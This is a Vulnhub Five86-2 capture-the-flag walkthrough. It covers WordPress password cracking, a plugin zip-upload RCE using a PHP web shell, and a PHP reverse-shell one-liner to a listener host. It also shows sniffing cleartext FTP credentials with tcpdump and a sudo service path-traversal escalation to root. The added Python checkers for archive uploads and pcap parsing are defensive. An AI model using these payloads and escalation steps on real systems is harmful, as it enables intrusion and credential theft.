
Vulnhub - Five86-2 writeup

Nmap

Nmap shows only two open ports (HTTP and FTP). We'll start our enumeration with the HTTP service.


HTTP

The website is running WordPress, so first add the IP to /etc/hosts so that the site's links resolve:

192.168.56.146 five86-2

I then ran wpscan against it, enumerating users (u) and all plugins (ap):

➜ wpscan -e u,ap --no-banner --wp-content-dir  wp-content/ --url http://five86-2/

wpscan found 5 usernames, so I ran a dictionary attack against those accounts: I put the usernames in a file named users.txt, used rockyou as the password list (wpscan's -U and -P options), and two of them cracked:

barney:spooky1
stephen:apollo1

The stephen credentials also worked on the FTP service. I enumerated a lot of files over FTP, but none of them led anywhere, and logging into WordPress as stephen was equally uninteresting. Logging in as barney, however, shows that barney is allowed to manage plugins.

Only one of the plugins was active, so I looked for an exploit for it and found WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution. The only issue with that exploit is its final step: it tells you to visit wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami, but the correct path is wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami (wp-content instead of wp-admin). Everything else is the same. The plugin accepts a zip archive and extracts it under wp-content/uploads, so a zip that contains a PHP file becomes a web shell:

# harmless decoy page
echo "<html>hello</html>" > index.html
# single quotes matter: in double quotes the shell would expand $_GET to an empty string
echo '<?php echo system($_GET["cmd"]); ?>' > index.php
zip poc.zip index.html index.php

Then upload the zip file through the plugin and visit http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami; you should have RCE.
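The bug here is that the plugin extracts an attacker-supplied archive under the web root without checking what is in it. As an added example (not code from the page, the plugin or its exploit), the following Python checker rebuilds the same poc.zip in memory and shows what an upload handler should have refused: entries with a server-executable extension, .htaccess overrides, and entry names that escape the extraction directory (the latter goes slightly beyond the walkthrough, since the same extract-a-zip pattern is also how zip-slip bugs happen). The extension list and the decision to check every dotted suffix, not only the last one, are my assumptions about what the target web server would execute.

```python
"""Reject archive uploads that would drop server-executable files under the web root.

Constructed example: builds the walkthrough's poc.zip (index.html + index.php) in
memory and runs it through a small entry-name scanner. Stdlib only.
"""
from __future__ import annotations

import io
import posixpath
import zipfile

# Assumption: extensions a PHP-capable web server will execute. Apache's mod_mime
# also matches "shell.php.txt"-style names, so every dotted suffix is checked.
EXECUTABLE_SUFFIXES = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


def entry_problems(name: str) -> list[str]:
    """Return the reasons a single archive entry name should be rejected (empty = ok)."""
    problems = []
    norm = posixpath.normpath(name.replace("\\", "/"))
    # Absolute paths or ".." components would write outside the extraction dir (zip slip).
    if norm.startswith("/") or norm == ".." or norm.startswith("../"):
        problems.append("escapes extraction directory")
    base = posixpath.basename(norm)
    suffixes = {part.lower() for part in base.split(".")[1:]}
    if suffixes & EXECUTABLE_SUFFIXES:
        problems.append("server-executable extension")
    if base == ".htaccess":
        problems.append("web server config override")
    return problems


def scan_upload(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map each offending entry in the archive to its list of problems."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            problems = entry_problems(info.filename)
            if problems:
                findings[info.filename] = problems
    return findings


def build_poc_zip() -> bytes:
    """The walkthrough's poc.zip: a decoy page plus a one-line PHP web shell."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.html", "<html>hello</html>")
        zf.writestr("index.php", '<?php echo system($_GET["cmd"]); ?>')
    return buf.getvalue()


if __name__ == "__main__":
    for entry, why in scan_upload(build_poc_zip()).items():
        print(f"reject {entry}: {', '.join(why)}")
```

Run it and the decoy index.html passes while index.php is flagged; an upload handler that applied this before extracting would have blocked the whole chain above. An allow-list of permitted extensions (the plugin only needs HTML, JS, CSS and media) is the stricter alternative to this deny-list.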

Now we can use this RCE to get a reverse shell. The usual nc one-liner didn't work, so I used the following PHP one-liner instead (start a listener with nc -lvnp 4444 on 192.168.56.1 first, and URL-encode the command when passing it through the cmd parameter, since it contains spaces, quotes and semicolons):

php -r '$sock=fsockopen("192.168.56.1",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'


Privilege escalation

I now had two usernames and passwords, so I tried su with both and was able to switch to the stephen account.

I then ran my enumeration script and found a SUID binary, but it could only be run by peter. After looking around for a while I noticed that stephen was in the pcap group.

The enumeration script also showed that tcpdump had file capabilities set (getcap lists them), which is what lets a non-root user capture packets; together with the pcap group membership that is a strong hint.

So I ran tcpdump on the loopback interface for five minutes to see what I could catch:

timeout 300 tcpdump -i lo -w hack.pcap

I then pulled the capture to my machine over FTP to analyze it. It contained FTP traffic on the loopback interface with a login for the user paul, and since FTP authenticates in cleartext the password was right there in the USER/PASS exchange:

paul:esomepasswford
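Wireshark's "Follow TCP Stream" is the quick way to read that exchange; as an added example (not code from the page or from the box's author) here is the same extraction done in plain Python, so it can be scripted over a big capture or run where Wireshark is not available. It parses the classic libpcap container, Ethernet frames (link type 1, which is what tcpdump writes for lo on Linux) or Linux cooked capture (113), IPv4 and TCP, then concatenates each client-to-server stream in capture order and pulls out USER/PASS pairs. The sample capture at the bottom is constructed in memory and reproduces the kind of loopback FTP login the walkthrough found; the port, sequence numbers and banner text are made up, and the parser assumes no retransmissions or out-of-order segments (no sequence-number reassembly).

```python
"""Extract FTP logins from a libpcap capture. Stdlib only.

Constructed example: build_sample_pcap() fabricates a loopback FTP login so the
parser can be run without a real capture.
"""
from __future__ import annotations

import re
import socket
import struct
from collections import defaultdict

LINKTYPE_ETHERNET = 1      # what tcpdump -i lo writes on Linux
LINKTYPE_LINUX_SLL = 113   # what tcpdump -i any writes
FTP_PORT = 21

USER_RE = re.compile(rb"^USER[ \t]+(\S+)", re.M)
PASS_RE = re.compile(rb"^PASS[ \t]+(.*?)\r?$", re.M)


def pcap_records(data: bytes):
    """Yield (linktype, packet_bytes) for every record of a classic libpcap file."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic in (0xA1B2C3D4, 0xA1B23C4D):      # little-endian, usec or nsec timestamps
        end = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):    # big-endian
        end = ">"
    else:
        raise ValueError("not a libpcap file (pcapng is not handled here)")
    linktype = struct.unpack_from(end + "I", data, 20)[0]   # 24-byte global header
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from(end + "IIII", data, off)
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def tcp_segment(linktype: int, pkt: bytes):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP packet, else None."""
    if linktype == LINKTYPE_ETHERNET:
        ethertype, ip_off = struct.unpack_from("!H", pkt, 12)[0], 14
    elif linktype == LINKTYPE_LINUX_SLL:
        ethertype, ip_off = struct.unpack_from("!H", pkt, 14)[0], 16
    else:
        return None
    if ethertype != 0x0800 or pkt[ip_off + 9] != 6:      # IPv4 carrying TCP only
        return None
    ihl = (pkt[ip_off] & 0x0F) * 4
    total_len = struct.unpack_from("!H", pkt, ip_off + 2)[0]
    src = socket.inet_ntoa(pkt[ip_off + 12:ip_off + 16])
    dst = socket.inet_ntoa(pkt[ip_off + 16:ip_off + 20])
    tcp_off = ip_off + ihl
    sport, dport = struct.unpack_from("!HH", pkt, tcp_off)
    data_off = (pkt[tcp_off + 12] >> 4) * 4
    return src, sport, dst, dport, pkt[tcp_off + data_off:ip_off + total_len]


def ftp_logins(pcap: bytes) -> list[tuple[str, str, str]]:
    """Return (client, user, password) for every FTP login attempt in the capture."""
    streams: dict[tuple, bytearray] = defaultdict(bytearray)
    for linktype, pkt in pcap_records(pcap):
        seg = tcp_segment(linktype, pkt)
        if seg is None or seg[3] != FTP_PORT:            # client -> server side only
            continue
        src, sport, dst, dport, payload = seg
        streams[(src, sport, dst, dport)] += payload     # capture order, no reassembly
    logins = []
    for (src, sport, _, _), buf in streams.items():
        for user, pw in zip(USER_RE.findall(buf), PASS_RE.findall(buf)):
            logins.append((f"{src}:{sport}", user.decode(errors="replace"), pw.decode(errors="replace")))
    return logins


def _packet(src: str, sport: int, dst: str, dport: int, payload: bytes) -> bytes:
    """Ethernet + IPv4 + TCP frame; checksums left zero (the parser never checks them)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + tcp + payload


def build_sample_pcap() -> bytes:
    """Constructed loopback capture of an FTP login like the one the walkthrough found."""
    c, s, cport = "127.0.0.1", "127.0.0.1", 40321
    frames = [
        _packet(s, FTP_PORT, c, cport, b"220 FTP server ready.\r\n"),
        _packet(c, cport, s, FTP_PORT, b"USER paul\r\n"),
        _packet(s, FTP_PORT, c, cport, b"331 Please specify the password.\r\n"),
        _packet(c, cport, s, FTP_PORT, b"PASS esomepasswford\r\n"),
        _packet(s, FTP_PORT, c, cport, b"230 Login successful.\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    for client, user, pw in ftp_logins(build_sample_pcap()):
        print(f"{client} -> {user}:{pw}")
```

To use it on the real capture, replace build_sample_pcap() with open("hack.pcap", "rb").read(). The defender's lesson is the same one the box teaches: a service that authenticates in cleartext over the loopback interface is only as private as the least-privileged user who can open a raw socket, and giving tcpdump file capabilities plus a pcap group makes that a lot of users.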

We are now paul, but we need to become peter. Looking around again (sudo -l), I found that paul is allowed to run /usr/sbin/service as peter.

I used gtfo to search GTFOBins for service and found a way to spawn a shell with it. service runs the init script /etc/init.d/<name> and does not sanitize the name against path traversal, so ../../bin/sh resolves to /bin/sh:

sudo -u peter service ../../bin/sh

peter in turn has sudo rights: he is allowed to run passwd as root.

So I used that (sudo passwd root) to change the root password to hackerman.

Then su root gave the root shell and the root flag.


Really enjoyed this one, looks like we’ll be getting another awesome series from @DCAU7.

Thanks to @Five86_x for letting me beta test this.


Thanks for reading, Feedback is always appreciated.

Follow me @0xmzfr for more “Writeups”. And if you'd like to support me, consider donating 😄